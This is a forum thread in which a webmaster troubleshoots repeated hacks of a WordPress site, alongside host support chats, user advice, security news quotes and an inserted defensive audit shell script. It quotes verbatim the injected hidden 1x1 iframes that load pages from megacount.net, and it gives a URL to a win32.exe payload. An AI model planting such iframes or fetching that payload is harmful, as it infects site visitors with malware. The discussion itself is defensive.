Response (part 2 of): I keep getting hacked...
This is in continuation from my original post:
http://www.gfy.com/fucking-around-and-business-discussion/660506-getting-hacked-2.html

I had to end up deleting everything from the server and reinstall, but again I was ONLY running WP. So I decided to turn off my computers, shut everything down, and take a little trip: I went to my house in Arizona for the weekend. I come back and it is hacked again. This time I have different code embedded at the top: http://i111.photobucket.com/albums/n...tbaron00/1.gif

Here is the first conversation:

Monday, October 02, 2006 5:19:24 PM (10/2/2006 9:19:24 PM - GMT) Powered by SightMax.
Welcome to Webair, Alex will be right with you.
Alex: hello, how may I help you?
Rob: yeah I need a lot of help.
Rob: my website has been compromised and I was wondering if you could assist me in finding a solution?
Alex: what site?
Rob: www.howgay.com
Alex: in what way was it compromised?
Alex: is there a ticket # on this?
Rob: no ticket number, every day or other day.....code is being inserted into the header portion. its a trojan.
Rob: the code in there at the moment is
Rob: :
Rob: <iframe src='http://megacount.net/adv/066/new.php' width=1 height=1></iframe> <iframe src='http://megacount.net/adv/new.php?adv=66' width=1 height=1></iframe>
Rob: I was told ::
Rob: Here's a little suggestion to see what is running in the background: I'm presuming this malicious script is being called by a cron job, so log in by ssh with your root password and type in crontab -l. See what is running in the background.
Rob: because i have a rootkit on the server?
Alex: i'll check cron
Rob: anything
Rob: ?
Alex: sorry still working on it
Rob: oh cool, I dont mean to bother you. sorry
Rob: ?
Alex: almost done checking
Rob: okay cool thanks again
Alex: there are no crontabs for that user
Alex: we suggest upgrading all the scripts to the latest version which is most probably the reason of compromises
Rob: i only run wordpress
Rob: its the most up to date one
Alex: <iframe src='http://megacount.net/adv/066/new.php' width=1 height=1></iframe> <iframe src='http://megacount.net/adv/new.php?adv=66' width=1 height=1></iframe>
Alex: where is the code?
Rob: on the very top
Rob: of the index page
Alex: a senior tech will be able to take a look at this issue in 5-10 minutes.
Alex: please dont remove it
Alex: keep the page as it is
Rob: okay, how will i get an update?
Alex: i will create a ticket on this on your behalf and you'll get an email
Rob: okay
Rob: cool
Rob: so ill just sit tight
Rob: have a good day
Visitor Rob has ended the chat

Then my second conversation after hours of no response:

Adrian: Hi, how may i help?
RobV: yeah adrian, i was talking to you earlier about my hacked website.
Adrian: the exploit is not on our side
RobV: and is there any record of when it was changed? or anything?
Adrian: one moment
Adrian: where on the site does it show its hacked
RobV: on the main page
RobV: there is embedded code
RobV: and when you visit the site
RobV: it tries to load a trojan
Adrian: i believe the problem lies in your computer at home
Adrian: it might have gotten to the server through an upload
Adrian: trojans don't spread on virtual unix systems
RobV: i had my computers off all weekend for this specific reason
Adrian: i'm on a unix machine and when i pull up the site thats all i see, the site
Adrian: get some good antivirus software, i recommend an updated Norton Antivirus and completely download all the content and scan your computer

And thats where I sit, NOTHING NEW, NOTHING SOLVED. And yes - I already have the most up to date Norton software, everything has been scanned and double checked.
BUT MORE IMPORTANTLY - my "infected computer at home" wasn't on, and I have not accessed my server SINCE everything was "fixed". Also it only happens to this site folder; my other domains and other sites are not infected (and yes I have been working on them and uploading). Weird?
drama.....?
I am still also working on this.. No one seems to have much of a clue on how to totally clear this up...
PLEASE let me know if you find a fix and I will do the same.. THX
Is your copy of wordpress current? Do you run anything else on it? Is this a shared WebAir system?
It's pretty trivial for bad permissions or weak permissions to let people fuck with your stuff. When I was (shortly) with webair, shared7, the machine I was on, didn't use suexec/phpsuexec, so everyone ran on the webserver as the same PID. It'd be really trivial for someone to execute find, steal your password info, modify or insert their own administrator password hash, and log into your WordPress. I estimate maybe three seconds with one single script that globs recursively.. if server7 isn't down every 10 seconds these days.
Quote:
Webair shared.
ehm...okay....
i can help you fix it, please ICQ me asap, 120594593
I saw this when I viewed the source of a page:
http://megacount.net/adv/0/win32.exe maybe that is the virus/backdoor found here: http://megacount.net/adv/new.php
Did you check all the permissions on your WP files?
Was your computer at home actually infected with anything?
Quote:
Try chmodding your public_html directory 771, or 751, then leave everything else as normal. See if it happens again (if it's a script on the server, '1' will let things execute and be read, but you won't be able to get a directory listing, so skr1pt kiddy hacks will fail.)
I may be able to code up a pascal program for you to resolve this issue
ICQ 532-764-769
Quote:
that could result in erasing the root folder if permissions on the box are set to 777 at a root level
Quote:
So, if public_html = 771 robv:robv and apache runs at nobody, or www, it can read any subdirectories and files, just not stat to do a directory listing. 1 != 7
Quote:
at least advise to back up if nothing else
ha ha no one ever wants to take responsibility for anything these days.
Quote:
If I am doing something to cause this I would just like to be informed how to prevent it, and I would take responsibility.
The DNS for megacount.net points towards the domain game4all.biz. When you Google that domain you see a lot of people having issues with trojans/malware on their computers and having servers infected.
Some exploits are hard to track down; it could be as simple as a shell script disguised as an image. The one thing most of these exploits have in common is that they attack world writable files. Not many files need to be world writable, but some virtual hosting setups create lots of them due to the way the virtual accounts are managed.
If you can ssh to your account, you can run find /your/directory -perm +o=w -follow and get a list of world writable files. I'm betting the files that keep getting defaced are world writable. You can remove the world writable bit with this command: chmod o-w file.name
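An added audit script (not from the thread, and not Webair's or WordPress's code) that ties together the permission advice above and the world-writable post: it lists world-writable entries as that post describes (using the portable -perm -o=w spelling), greps for the hidden 1x1 iframe pattern Rob pasted, and clears the o-w bit. The sample tree it builds is constructed for the demo, and the iframe URL in it is a placeholder.

```shell
#!/bin/sh
# Audit a web root for the two symptoms discussed in the thread:
# world-writable files/dirs and injected 1x1 iframes.
# Usage: d=$(make_sample_tree); find_world_writable "$d"; harden_world_writable "$d"

# List every world-writable file or directory under $1 (the post's
# "find -perm +o=w" idea; -o=w is the form current find accepts).
find_world_writable() {
    find "$1" -perm -o=w -print 2>/dev/null | sort
}

# Report "file:line" for each hidden iframe (width=1, the pattern Rob pasted).
find_injected_iframes() {
    grep -rniE "<iframe[^>]*width=['\"]?1['\"]?[[:space:]>]" "$1" 2>/dev/null \
        | cut -d: -f1,2 | sort -u
}

# Remove the world-write bit (chmod o-w, as the post suggests) from every
# world-writable entry under $1 and print how many entries were fixed.
harden_world_writable() {
    n=0
    for f in $(find "$1" -perm -o=w -print 2>/dev/null); do
        chmod o-w "$f" && n=$((n + 1))
    done
    echo "$n"
}

# Constructed sample tree (not real site data): one clean page, one
# world-writable index.php carrying an injected iframe, and a 777 uploads dir.
# Modes are set explicitly so the demo does not depend on the caller's umask.
make_sample_tree() {
    dir=$(mktemp -d)
    mkdir -p "$dir/wp-content/uploads"
    printf '<html><body>clean</body></html>\n' > "$dir/about.php"
    printf "<iframe src='http://EXAMPLE-PLACEHOLDER/x.php' width=1 height=1></iframe>\n<?php echo 'hi'; ?>\n" \
        > "$dir/index.php"
    chmod 755 "$dir" "$dir/wp-content"
    chmod 644 "$dir/about.php"
    chmod 666 "$dir/index.php"
    chmod 777 "$dir/wp-content/uploads"
    echo "$dir"
}
```

Hardening the bits stops the next overwrite but does not clean the file; find_injected_iframes still reports index.php afterwards, which is the point: run it again after each cleanup to confirm the code has not come back.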
Quote:
why oh why would you rebuild the kernel?
If you don't have this fixed tomorrow please icq me.
Why didn't your host offer to check Apache logs?????
You need to change hosts and install with a new host and see if you still have the same issue. It seems like your FTP, SSH or telnet (disable it) password was compromised.
Quote:
"Hackers are launching attacks on popular PHP-based blogging, wiki and content management program that failed to patch a serious security hole discovered in July. The attacks exploit flaws in the way PHP libraries handle XML-RPC commands, and appear to be targeting installations of WordPress and Drupal. If left unpatched, an attacker could compromise a web server through vulnerable programs including WordPress, Drupal, PostNuke, Serendipity, phpAdsNew and phpWiki, among others. These projects all issued fixes six months ago, as did the authors of the affected PHP libraries. But as is often the case, some web servers and individual blogging applications remain unpatched. The Internet Storm Center has been receiving reports of attacks that install a remote access trojan through a weakness in the XML-RPC function in some PHP libraries, which allow applications to exchange XML data using remote procedure calls (RPC). XML-RPC has many uses in web applications, including "ping" update notifications for RSS feeds. The affected libraries, including PHPXMLRPC and Pear XML-RPC, are included in many interactive applications written in PHP. The flaws may be of particular interest to phishing operations, which have recently been installing spoof pages through security holes in bulletin boards and content management apps. Updated copies of the affected PHP libraries are now available, and immediate upgrades are recommended." :2 cents:
I dont know if this has any importance (esp how you were talking about the iframing) but I just wanted to add it......

HostGator: cPanel Security Hole Exploited in Mass Hack
HostGator says hackers compromised its servers using a previously unknown security hole in cPanel, the control panel software that is widely used by hosting providers. "I can tell you with all accuracy that this is definitely due to a cPanel exploit that provides root access and all cPanel servers are affected," said HostGator system administrator Tim Greer. "This issue affects all versions of cPanel, from what I can tell, from years ago to the current releases, including Stable, Release, Current and Edge." cPanel has just released a fix. "Running /scripts/upcp will fix the vulnerability in all builds," cPanel said in a message on its user forums. "Please note that this is a local exploit which requires access to a cPanel account. ... If you believe you have been exploited through this vulnerability, you are welcome to submit a support request for assistance." Hackers gained access to HostGator's servers late Thursday and began redirecting customer sites to outside web pages that exploit an unpatched VML security hole in Internet Explorer to infect web surfers with trojans. The existence of the new "0-day" exploit of cPanel leaves a large number of hosting companies vulnerable to similar attacks until they install the patch. The risk is mitigated somewhat by the fact that it is a local exploit, meaning any attack on a host must be launched from an existing account with cPanel access. HostGator site owners said iframe code inserted into their web pages was redirecting users to the malware-laden pages. Company staff made several efforts to reconfigure servers on Friday, only to have the exploits recur. Since the attacker controlled a cPanel account at HostGator, the exploit could be repeated after each cleanup of the malicious code. By early Saturday morning, HostGator managers were assuring users that the cause of the redirections had been isolated, and was due to a new exploit targeting cPanel.
bump. two of my wordpress blogs got hit with this shit
it's all over the place as far as i can tell. i had to go through all my sites and find/delete that shit code. then i had to change all the permissions to read only. fucking sucked. it spread out of wordpress and on to regular PHP pages on sites with no scripts at all.
buuuuump just got hit AGAIN today